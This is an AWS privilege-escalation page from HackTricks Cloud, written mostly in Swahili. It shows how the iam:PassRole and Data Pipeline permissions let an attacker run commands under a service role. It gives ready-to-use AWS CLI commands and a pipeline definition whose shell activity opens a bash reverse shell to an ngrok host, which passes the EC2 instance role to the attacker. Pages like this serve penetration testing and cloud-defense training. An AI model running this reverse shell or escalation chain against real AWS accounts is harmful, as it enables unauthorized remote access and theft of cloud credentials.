HackTricks CloudAWS - Datapipeline Privesc
Reading time: 3 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
datapipeline
Kwa maelezo zaidi kuhusu datapipeline, angalia:
AWS - DataPipeline, CodePipeline & CodeCommit Enum
iam:PassRole, datapipeline:CreatePipeline, datapipeline:PutPipelineDefinition, datapipeline:ActivatePipeline
Watumiaji walio na hizi idhini wanaweza kupandisha mamlaka kwa kuunda Data Pipeline ili kutekeleza amri zozote kwa kutumia idhini za role iliyoteuliwa:
aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string
Baada ya kuunda pipeline, mshambuliaji anasasisha ufafanuzi wake ili kuamuru vitendo maalum au uundaji wa rasilimali:
{
"objects": [
{
"id": "CreateDirectory",
"type": "ShellCommandActivity",
"command": "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
"runsOn": { "ref": "instance" }
},
{
"id": "Default",
"scheduleType": "ondemand",
"failureAndRerunMode": "CASCADE",
"name": "Default",
"role": "assumable_datapipeline",
"resourceRole": "assumable_datapipeline"
},
{
"id": "instance",
"name": "instance",
"type": "Ec2Resource",
"actionOnTaskFailure": "terminate",
"actionOnResourceFailure": "retryAll",
"maximumRetries": "1",
"instanceType": "t2.micro",
"securityGroups": ["default"],
"role": "assumable_datapipeline",
"resourceRole": "assumable_ec2_profile_instance"
}
]
}
note
Kumbuka kwamba role kwenye mstari 14, 15 na 27 inapaswa kuwa role inayoweza kuchukuliwa na datapipeline.amazonaws.com na role kwenye mstari 28 inapaswa kuwa role inayoweza kuchukuliwa na ec2.amazonaws.com kwa kutumia EC2 profile instance.
Zaidi ya hayo, EC2 instance itapata ufikiaji kwa role inayoweza kuchukuliwa tu na EC2 instance (hivyo unaweza kuiba ile pekee).
aws datapipeline put-pipeline-definition --pipeline-id <pipeline-id> \
--pipeline-definition file:///pipeline/definition.json
The faili ya ufafanuzi wa pipeline, iliyotengenezwa na mshambuliaji, ina maagizo ya kutekeleza amri au kuunda rasilimali kupitia AWS API, ikitumia ruhusa za jukumu la Data Pipeline ili uwezekano wa kupata vibali vya ziada.
Athari Inayoweza Kutokea: Privesc moja kwa moja kwa role ya huduma ya ec2 iliyotajwa.
Marejeo
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.